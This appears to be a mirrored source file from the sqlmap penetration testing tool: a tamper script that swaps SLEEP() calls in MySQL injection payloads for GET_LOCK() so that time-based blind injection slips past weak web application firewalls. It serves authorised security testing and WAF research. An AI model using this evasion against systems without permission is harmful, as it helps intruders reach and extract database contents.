Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
 Path: blob/master/tamper/sleep2getlock.py
2983 views
1
#!/usr/bin/env python

2


3
"""

4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)

5
See the file 'LICENSE' for copying permission

6
"""

7


8
from lib.core.data import kb

9
from lib.core.enums import PRIORITY

10


11
__priority__ = PRIORITY.HIGHEST

12


13
def dependencies():

14
    pass

15


16
def tamper(payload, **kwargs):

17
    """

18
    Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"

19


20
    Requirement:

21
        * MySQL

22


23
    Tested against:

24
        * MySQL 5.0 and 5.5

25


26
    Notes:

27
        * Useful to bypass very weak and bespoke web application firewalls

28
          that filter the SLEEP() and BENCHMARK() functions

29


30
        * Reference: https://zhuanlan.zhihu.com/p/35245598

31


32
    >>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName

33
    True

34
    """

35


36
    if payload:

37
        payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName)

38


39
    return payload

40


41